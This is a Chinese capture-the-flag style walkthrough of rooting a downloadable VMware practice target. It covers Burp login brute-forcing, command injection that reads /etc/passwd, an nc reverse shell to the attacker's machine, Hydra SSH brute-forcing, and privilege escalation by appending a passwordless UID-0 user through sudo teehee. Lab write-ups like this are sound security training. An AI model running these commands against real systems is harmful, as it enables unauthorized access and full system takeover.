导入
下载地址:
夸克网盘:https://pan.quark.cn/s/e6b5b7c6524a 提取码:1jJS
下载完成后在VMware导入即可
信息收集
先扫描一下靶机的ip地址

接着扫描开放的端口

有22和80端口。
访问80端口,发现只是一个普通的登录页面,并不是CMS站点。

使用dirsearch工具扫描一下看看有没有什么东西。
dirsearch -u 'http://192.168.31.180/'扫描完成,没啥可用的。

开始渗透
用Bp试试爆破
现在bp中把拦截打开

接着随便输入账户名和密码后点击Submit,bp会拦截到这个包

右键,点击“发送到“intruder”

然后点击上面的“Intruder”,把下面的密码选择上,点击右边的“添加payload位置”

接着点击“payload”,配置爆破参数

可以看到中间的清单是空的,咱们得自己添加字典,这里就用bp自带的字典试试。当然可以自己导入字典。
点击“从列表中添加”,接着选择“密码”就行。

配置完成后点击右边的“开始攻击”就可以了。

等爆破完成后,咱们可以根据后面的长度判断哪个是密码,然后看看下边“响应”中是不是已经登录成功。

这里可以看到密码是happy。
登录一下,登录成功。

有个Command,点击一下。
出来3个选项,选择一个点击Run,发现执行的是linux命令。

咱们通过bp抓包修改一下命令试试。
开启拦截,前端随便选一个选项,点击Run,然后把包右键发送到repeater

修该完后点击发送,就能看到右边的返回包了,能看到替换成功了,显示出了/etc/passwd文件内容。

在这里面发现了3个用户,charles、jim、sam
接着弄一个反弹shell
先在终端输入下面命令,开始监听
nc -lvnp 4444
接着在bp上把命令改成下面的东西,然后发送。
nc 192.168.31.149 4444 -e /bin/bash 
终端连接成功

使用python创建一个可交互shell
python -c 'import pty;pty.spawn("/bin/bash")'
刚刚不是找到3个用户吗,咱们分别进入3个用户的目录下面找找有没有啥东西。
在/home/jim/backups目录下面找到了这个文件,cat了一下是密码字典。


把这些密码先保存到一个文档中,我放到了/home/kali/Desktop/123456.txt
前面不是扫描到了22端口吗,用这个字典爆破一下试试。
先把3个用户名保存到文件中,我存到了/home/kali/Desktop/1.txt
使用Hydra工具进行爆破。
hydra -L /home/kali/Desktop/1.txt -P /home/kali/Desktop/123456.txt 192.168.31.180 ssh
成功爆破出一个密码,用这个账号登录看看。

登录成功,并且还显示有封邮件,找找在哪。
最终在/var/mail目录下找到Jim的邮件。

cat查看一下

在下面发现了charles用户的密码,那咱们切换到charles用户。

在这找不到什么有用的线索了,咱们试试提权。
先看看sudo -l

发现了teehee,这也是一款文件编辑器,只不过和vim,nano等编辑器比起来确实有点小众。咱们使用这个工具进行提权。
用这个工具编辑/etc/passwd文件,添加一个用户。
echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
用户名:密码占位符:UID:GID:注释信息:家目录:登录Shell
回车后进入新添加的test用户,就有root权限了。

进入/root目录查看flag文件,完成!